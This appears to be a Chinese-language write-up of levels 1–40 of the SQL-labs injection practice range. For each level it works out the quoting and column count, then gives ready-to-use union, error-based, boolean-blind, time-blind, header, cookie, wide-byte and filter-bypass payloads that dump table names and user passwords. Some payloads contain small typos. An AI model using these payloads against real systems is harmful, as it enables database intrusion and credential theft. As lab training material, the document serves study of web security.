SQL-labs通关方法(1-40)

第一关

1、打开SQL-labs靶场，打开第一关靶场

2、判断闭合类型

3、判断列数

?id=1' order by 4--+

4、联合查询，显示

?id=1'union select 1,2,3 --+

5、获取当前数据库名和版本号

?id=1'union select 1,database(),version() --+

6、查看找到的数据库下的所有表名

?id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="secruity" --+

7、查看users表下所有字段名

?id=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+

8、查看users表中所有数据

？id' union select 1,2,group_concat(id,'~',username,'~',password) from users --+

第二关

1、判断闭合类型

发现必闭合类型为数字型

2、接下来步骤同第一关相同，使用命令继续查询数据库名，数据表名，以及users表中所有数据

?id=1 order by 3 --+
?id=-1 union select 1,2,3 --+
?id=-1 union select 1,database(),version() --+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1 union select 1,2,group_concat(username ,id , password) from users --+

第三关

1、判断闭合类型

发现闭合类型为字符型    ')闭合

2、接下来步骤同第一关相同，使用命令继续查询数据库名，数据表名，以及users表中所有数据

?id=1') order by 3 --+
?id=-1') union select 1,2,3 --+
?id=-1') union select 1,database(),version() --+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1') union select 1,2,group_concat(username ,id , password) from users --+

第四关

1、判断闭合类型

发现闭合类型为字符型    ")闭合

?id=1") order by 3 --+
?id=-1") union select 1,2,3 --+
?id=-1") union select 1,database(),version() --+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1") union select 1,2,group_concat(username ,id , password) from users --+

2、接下来步骤同第一关相同，使用命令继续查询数据库名，数据表名，以及users表中所有数据

第五关

1、判断闭合类型

输入' 发现报错，--+闭合成功，可以使用报错注入操作

2、判断列数

判断表列数，输入4时报错,说明只有3列

?id=1 order by 3 

3、使用报错注入函数updatexml() 查看数据库名

?id=1' and updatexml(1,concat(1,database()),1) --+

4、查看数据库中所有表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security') ),1) --+

5、查看users表中所有列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ),1) --+

6、查具体的username和password，只能通过limit一条一条查询

?id=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

 

 ?id=1' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+

?id=1' and updatexml(1,concat(1,(select password from users limit 0,1)),1)--+

第六关

1、判断闭合类型发现为  "闭合   并且在只输入一个 " 时会有报错，我们可以使用报错注入来操作

2、判断列数

?id=1" order by 3--+

3、余下操作与第五关操作相同，使用如下报错注入分别查看数据库名，数据表名，以及表中每一条内容

?id=1' and updatexml(1,concat(1,database()),1) --+

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security') ),1) --+

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ),1) --+

?id=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

第七关

1、判断闭合类型

输入?id=1'是发现报错，在输入" 时发现页面正常，所以id应该是'字符串，但是页面报错，我们尝试输入')--+,发现还是报错，然后尝试输入')) --+ 发现页面正常，所以是')) 闭合

2、使用布尔盲注进行SQL注入

1、判断数据库长度

?id=1')) and length((select database()))>7 --+

在输入>7时，页面正常，输入>8时，页面出错,说明数据库长度等于8. 

2、依次判断数据库每个字符的ASCII值，对照ASCII表查看

?id=1')) and ascii(substr((select database()),1,1))>114--+

输入>114，页面正确，输入>115,页面出错。所以数据库名第一个字符的ASCII值为115

3、在得出数据库名后，判断所有表名字符长度

?id=1')) and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28--+

>28时页面正常，>29是页面报错，说明所有表名字符长度为29

4、逐一判断所有表名的ASCII值

?id=1')) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>101--+

eg：第一个字符ASCII值>100,页面正常，>101，页面错误，所以第一个字符的ASCII值为101，剩余依次查询，得出所有ASCII值，对照ASCII表得出所有表名。

5、判断users表中所有字段字符的长度

?id=1')) and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19--+

 >19时，页面正常，>20时，页面出错，所以所有字段字符长度为20

 

6、判断所有字段的ASCII值

?id=1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>104--+

eg：字段第一个ASCII值>104,页面正常，>105时，页面出错，所以第一个字符ASCII值为115,然后依次查询，得出所有字段名的ASCII值，对照ASCII表得出字段名

7、判断表中所有内容长度

?id=1')) and length((select group_concat(username,password) from users))>189--+

>189,页面正常，>190，页面出错，所以所有内容字符长度为190

8、逐一判断users表内容中所有字符的ASCII值，对照ASCII表得出所有内容

?id=1')) and ascii(substr((select group_concat(username,password) from users),1,1))>67--+

eg：第一个内容字符ASCII值>67 页面正常，>68，页面报错，所以第一个字符ASCII值为68

依次查找剩余所有内容字符ASCII值，对照ASCII表得出所有内容

第八关

1、判断闭合方式

输入' 发现页面什么都不显示，加入--+后发现页面又出现显示，尝试其他过后发现页面只有一种有内容和一种没内容两种显示，这时我们使用布尔盲注进行SQL注入

2、注入方式同第七关相同

1、判断数据名长度，然后逐一判断数据库名对应的ASCII值，最后对照ASCII表得出数据库名

?id=1' and length((select database()))>7--+

?id=1' and ascii(substr((select database()),1,1))>114--+

 

 

2、判断数据表长度，然后逐一判断数据表名对应的ASCII值，最后对照ASCII表得出所有数据表名

?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28--+

?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>101--+

3、判断users表中所有字段长度，然后逐一判断字段对应的ASCII值，最后对照ASCII表得出所有字段名

?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19--+

?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>104--+

4、判断users表中所有内容的长度，然后逐一判断所有内容字符对应的ASCII值，最后对照ASCII表得出所有内容

?id=1' and length((select group_concat(username,password) from users))>189--+

?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>67--+

第九关

1、判断闭合方式

尝试各种闭合方式，发现无论输入什么，页面都不变,使用时间盲注判断一下闭合类型，发现是'闭合

?id=1' and if(1=1,sleep(3),1) --+

2、使用时间盲注进行注入

1、判断数据库名长度

?id=1'and if(length((select database()))>8,sleep(3),1)--+

>7,页面延迟三秒，>8时， 页面无延迟，所以数据库名长度为8

2、依次判断数据库名字符的ASCII值，对照ASCII表得出数据库名

?id=1' and if(ascii(substr((select database()),1,1))>114,sleep(3),1) --+

>114时，页面延迟三秒，>115时，页面无延迟，所以数据库名第一位字符的ASCII值为115

依次判断剩余字符的ASCII值。

3、判断数据库表名所有字符长度

?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1)--+

>28时，页面延迟三秒，>29时，页面无延迟，所以数据库中所有表的字符长度为29

4、逐一判断数据表名所有字符对应ASCII值

?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1)--+

> 100时，页面延迟三秒，>101时，页面无延迟，所以数据表名第一个字符的ASCII值为101，依次判断剩余字符ASCII值

5、判断users表中所有字段的字符长度

?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1)--+

>19时，页面延迟,>20时，页面没有延迟，所以字段中所有字符长度为20 ，

6、逐一判断users表中所有字段的字符ASCII值

?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>105,sleep(3),1)--+

>104时，页面延迟>105时，页面无延迟，所以字段中第一个字符的ASCII值为105，依次判断剩余字段字符ASCII值 

7、判断users表中所有内容的字符长度

?id=1' and if(length((select group_concat(username,password) from users))>189,sleep(3),1)--+

>189,页面延迟，>190页面无延迟，所以users表中所有内容字符长度为190 

8、逐一判断users表中所有内容的ASCII值，对照ASCII表中查找所有内容

?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>68,sleep(3),1)--+

 >67,页面延迟，>68，页面无延迟，所以users表中所有内容的第一个字符的ASCII值为68，依次判断剩余字符的ASCII值，对照ASCII表得出所有内容的字符

第十关

1、判断闭合方式

尝试各种闭合方式，发现无论输入什么，页面都不变,使用时间盲注判断一下闭合类型，发现是 " 闭合

?id=1"and if(ascii(substr((select database())))>7,sleep(3),1)--+

2、余下操作与第九关相同

1、判断数据库名长度，然后逐一判断数据库名的ASCII值，得出对应的数据库名

?id=1“and if(length((select database()))>9,sleep(5),1)--+

 

?id=1'”and if(ascii(substr((select database()),1,1))>114,sleep(3),1) --+

2、判断数据表所有字符长度，然后逐一判断数据表名所有字符的ASCII值，得出对应的数据表名

?id=1“and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1)--+

 ?id=1"and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1)--+

3、判断users表中所有字段字符长度，然后逐一判字段名的ASCII值，得出对应的字段名

?id=1"and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1)--+

?id=1"and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>105,sleep(3),1)--+

4、判断users表中所有内容字符长度，然后逐一判断表中字符的ASCII值，得出所有内容

?id=1"and if(length((select group_concat(username,password) from users))>189,sleep(3),1)--+

?id=1" and if(ascii(substr((select group_concat(username,password) from users),1,1))>68,sleep(3),1)--+

第十一关

1、判断闭合方式

在输入框输入1时页面没变化，输入1'时页面报错，输入万能密码1' or 1=1 # 登录成功

所以闭合方式为1' #闭合

2、判断列数

发现输入3时报错，只有两列

3、爆出显示位

4、联合查询数据库名

5、查询数据表名

6、查询users表字段名

7、查看users数据表中所有内容

第十二关

1、判断闭合方式

输入1和1'时页面没反应，输入1"时，页面报错，可以得出闭合方式是  1"）#

2、判断列数

发现只有两列

3、联合查询爆出显示位

4、联合查询数据库名

1") union select 1,(select database())#

5、查询数据表名

1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

6、查询users表中字段名

1") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#

7、查看users表中所有内容

1") union select 1,(select group_concat(id,username,password) from users)#

第十三关

1、判断闭合方式

输入1' 页面报错，发现是 1'）# 闭合

2、判断列数

输入3时报错，发现只有两列

3、查询爆出显示位，查询数据库名

1') and updatexml(1,concat(1,(select (database()))),1)#

使用联合查询之后发现没有显示位置，使用报错注入尝试查询数据库名，

4、查询数据表名

1') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

5、查询users表中字段

1') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

6、查询users表中所有内容

1') and updatexml(1,concat(1,(select username from users limit 0,1)),1)#

使用limit分别查询usernam和password表中所有内容

第十四关

1、判断闭合方式

输入1'，页面没变化，输入1"，页面报错，闭合方式为1   "#，输入万能密码进行验证是否闭合

2、判断列数

输入3报错，发现只有2列

3、查询数据库名

使用万能密码登陆后，发现没有显示位置，但是有报错，尝试使用报错注入查看数据库名

1" and updatexml(1,concat(1,(select (database()))),1)#

 

4、查询数据表名

1" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

5、查询users表字段

1" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#

6、查询user表中所有内容

使用limit分别查询username和password表中数据

1" and updatexml(1,concat(1,(select username from users limit 0,1)),1)#

第十五关

1、判断闭合方式

输入1' ，1" 没有任何变化，也没有报错，使用万能密码判断是否闭合，发现1' #成功闭合登录

2、使用时间盲注判断数据库名长度

admin'and if(length((select database()))>7,sleep(3),1) #

大于7，页面延迟，大于8，页面无延迟，所以数据库长度为8

3、依次判断数据库名的ASCII指，对照ASCII表，得出数据库名

admin' and if(ascii(substr((select database()),1,1))>114,sleep(3),1) #

 

 剩余字符依次判断得出

4、判断数据库中所有表字符长度

admin'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1) #

5、依次判断数据表中所有字符的ASCII值，得出数据表

admin'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1) #

6、判断users表中所有字段长度 

admin'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1) #

 

7、依次判断users表中所有字段的ASCII值

admin'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>104,sleep(3),1) #

 

8、判断users表中所有内容的字符长度

admin' and if(length((select group_concat(username,password) from users))>189,sleep(3),1) #

9、依次判断users表中所有字符的ASCII值

admin' and if(ascii(substr((select group_concat(username,password) from users),1,1))>68,sleep(3),1) #

第十六关

1、判断闭合注入

输入什么页面都没有变化，尝试输入万能密码 1") or 1=1 后发现页面进入登录成功界面，说明是")闭合，存在注入,使用时间盲注进行注入

2、判断数据库名长度

admin")and if(length((select database()))>7,sleep(3),1) #

3、依次判断数据库名的ASCII值

admin") and if(ascii(substr((select database()),1,1))>114,sleep(3),1) #

4、判断数据库中所有表字符长度

admin")and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>28,sleep(3),1) #

 

5、依次判断数据表中所有字符的ASCII值，得出数据表

admin")and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>100,sleep(3),1) #

 

6、判断users表中所有字段长度 

admin")and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>19,sleep(3),1) #

7、依次判断users表中所有字段的ASCII值

admin")and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>104,sleep(3),1) #

8、判断users表中所有内容的字符长度

admin") and if(length((select group_concat(username,password) from users))>104,sleep(3),1) #

9、判断users表中所有内容的字符ASCII值

admin") and if(ascii(substr((select group_concat(username,password) from users),1,1))>67,sleep(3),1) #

第十七关

1、判断闭合注入

输入admin    密码输入1'，发现报错，尝试报错注入，密码输入1'#,页面正常，闭合成功

2、查看数据库名

1' and (updatexml(1,concat(1, database()),1))#

 

3、查看数据表名

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security') ),1) #

4、查看emails表中列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails') ),1) #

5、查看emails表中所有内容

1' and updatexml(1,concat(1,(select group_concat(id,email_id) from emails)),1) #

第十八关

1、尝试输入正确密码

这里显示出了user-Agent，我们尝试在 user-Agent中注入

2、使用BP抓包

 

3、查看数据库名

1'and (updatexml(1,concat(1, database()),1))and '#

 

4、查看数据库表

1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1)) and '#

第十九关

1、输入正确密码查看admin

发现存在referer，尝试注入

2、使用BP抓包尝试

3、使用报错查询数据库名

1'and (updatexml(1,concat(1, database()),1))and '#

第二十关

1、输入正确密码查看

发现存在rcookie,尝试注入

2、使用BP抓包尝试

3、使用报错查询数据库名

1'and (updatexml(1,concat(1, database()),1))and '#

第二十一关

1、尝试正确密码登录

登录上去发现有COOKIE,但是不是熟悉的值，而是bse64编码过后的值，解码后发现是dumb

2、BP抓包

3、查看数据库名

正常输入联合查询发现编码不正确，将查询语句编码后输入

') union select 1,2,database() #

 

4、查看数据表名

将语句编码后输入查询

')union select1,2,group_concat(table_name) from information_schema.tables where table_schema="security" #

5、查看users表中所有字段名

将语句编码后输入

' )union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" #

 

6、查看users表中所有内容

将语句编码后输入

' )union select 1,2,group_concat(id,'~',username,'~',password) from users #

第二十二关

1、尝试登录查看

发现与二十一关显示内容相同，所有还是base64编码,,将语句编码后查询

2、BP抓包查看COOKIE

3、查看数据库名

" union select 1,2,database() #

 

4、查看数据表名

" union select1,2,group_concat(table_name) from information_schema.tables where table_schema="security" #

5、查看users表中所有字段名

" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" #

6、查看users表中所有内容

" union select 1,2,group_concat(id,'~',username,'~',password) from users #

第二十三关

1、判断闭合方式

尝试之后发现注释符都被过滤,两个' ' 可以闭合

2、判断列数

发现只有三列

3、查看数据库名

?id=-1' union select 1,2,database()'

4、查看数据表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

5、查看users表中的字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' '

6、查看users表中所有内容

?id=-1' union select 1,2,(select group_concat(username,password) from users) '

第二十四关

1、尝试正确密码登录查看

发现是改密码界面，使用二次注入尝试

2、1、注册一个 admin'#的账号，密码是123123

3、接下来登录该帐号后进行修改密码，修改为123456

4、登录admin账号，密码就是123456

第二十五关

1、判断闭合

打开页面发现and和or都被过滤，输入'报错，'--+ 闭合成功

2、联合查询注入查看数据库名

3、查看数据表名

?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security"--+

4、查看users表中字段名

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema="security" aandnd table_name="users" --+

5、查看users表中所有内容

?id=-1' union select 1,2,group_concat(username,passwoorrd) from users --+

第二十六关

1、判断闭合

输入' 发现报错，尝试闭合，根据页面提示发现空格被过滤

2、查看源码发现and or 和大部分注释符都被替换，尝试用字符代替空格尝试闭合,发现全部都被过滤,使用截断符尝试闭合.

3、使用报错注入查看数据库名

?id=1'anandd(updatexml(1,(concat(1,(database()))),1))anandd'1'='1

第二十七关

1、判断闭合

打开页面发现union和select都被过滤，输入'报错，and'1'='1 闭合成功

2、查看源码发现union select 和大部分注释符都被替换.用字符替代空格尝试

3、使用大小写+%a0来代替空格，查询数据库名

?id=100'%0aUNion%0aSElect%0a1,database(),3%0aand'1'='1

第二十八关

1、判断闭合 

打开页面发现union和select都被过滤，输入?id=1'报错，and'1'='1 闭合成功，输入查询发现报错，

 输入?id=1'and('1')=('1 闭合成功,查询语句正常

2、查看源码发现union select 和大部分注释符都被替换.用字符替代空格尝试

3、使用双写+%0a+('1')=('1绕过

第二十九关

1、判断闭合

页面显示世界上最好的防火墙

查看源码发现  会对输入的参数进行校验是否为数字，但是在对参数值进行校验之前的提取时候只提取了第一个id值，如果有两个id参数，第一个id参数正常数字，第二个id参数进行sql注入。sql语句在接受相同参数时候接受的是后面的参数值

输入?id=1'报错，--+ 闭合成功

2、查看数据库名

?id=1&id=-2' union select 1,2,database()--+

3、查看数据表名

?id=1&id=-2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=1&id=-2' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

5、查看users表中内容

?id=1&id=-2' union select 1,group_concat(password,username),3 from users--+

第三十关

1、判断闭合

输入?id=1'不报错，输入" 页面出错   --+页面闭合，所以是"闭合

2、查看数据库名

?id=1&id=-2" union select 1,2,database()--+

3、查看数据库表名

?id=1&id=-2" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

4、查看users表中字段名

?id=1&id=-2" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

 

5、查看users表中内容

?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

 第三十一关

1、判断闭合和列数

输入?id=1")--+  闭合成功，共有三列

2、查看数据库名

?id=-1") union select 1,2,database()--+

3、查看数据库表名

?id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=-1")union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

5、查看users表中内容

?id=-1") union select 1,2,group_concat(password,username) from users--+

 第三十二关

1、判断闭合和列数

输入' 发现’前有\，加入%df转为一个汉字字符 --+ 成功闭合，共有三列

2、查看数据库名

?id=-1%df'union select 1,2,database()--+

3、查看数据库表名

?id=-1%df'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

 ?id=-1%df%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

5、查看users表中内容

?id=-1%df' union select 1,2,group_concat(password,username) from users--+

 第三十三关

1、判断闭合

输入' 发现’前有\，加入%df转为一个汉字字符 --+ 成功闭合，共有三列

2、查看数据库名

?id=-1%df'union select 1,2,database()--+

3、查看数据库表名

?id=-1%df'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=-1%df%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

5、查看users表中内容

?id=-1%df' union select 1,2,group_concat(password,username) from users--+

 

 第三十四关 

1、判断闭合

这关为post提交，抓包输入' 发现’前有\，加入%df转为一个汉字字符 --+ 成功闭合，共有2列

2、查看数据库名

-1%df'union select 1,database()--+

3、查看数据库表名

-1%df'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?1%df%27union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

5、查看users表中内容

1%df' union select 1,group_concat(password,username) from users--+

 第三十五关

1、判断闭合

数字型？id=1 order by 3 --+ 成功闭合，共有三列

2、查看数据库名

?id=-1 union select 1,2,database()--+

3、查看数据库表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+

5、查看users表中内容

-1 union select 1,group_concat(password,username) from users--+

第三十六关

1、判断闭合和列数，一共有三列，是' 闭合

　

2、查看数据库名

?id=-1%df'union select 1,2,database()--+

　

3、查看数据库表名

　?id=-1%df'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=-1%df%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

5、查看users表中内容

?id=-1%df' union select 1,2,group_concat(password,username) from users--+

第三十七关

1、判断闭合和列数

　这关为post提交，抓包输入' 发现’前有\，加入%df转为一个汉字字符 --+ 成功闭合，共有2列

2、查看数据库名

　-1%df'union select 1,database()--+

3、查看数据库表名

-1%df'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

4、查看users表中字段名

?1%df%27union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

 

5、查看users表中内容

1%df' union select 1,group_concat(password,username) from users--+

 

第三十八关

1、判断闭合和列数

　'闭合，共有3列

2、查看数据库名

?id=-1' union select 1,2,database()--+

 

3、查看数据库表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

4、查看users表中字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

 

5、查看users表中内容

?id=-1' union select 1,2,group_concat(password,username) from users--+

第三十九关

1、判断闭合和列数

　判断是整数型闭合，共有三列

2、查看数据库名

?id=-1 union select 1,2,database()--+

3、查看数据库表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

4、查看users表中字段名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

5、查看users表中内容

?id=-1 union select 1,2,group_concat(password,username) from users--+

第四十关

1、判断闭合和闭合

发现是')闭合，共有三列

2、查看数据库名

　?id=-1') union select 1,2,database()--+

3、查看数据库表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

4、查看users表中字段名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

5、查看users表中内容

?id=-1‘) union select 1,2,group_concat(password,username) from users--+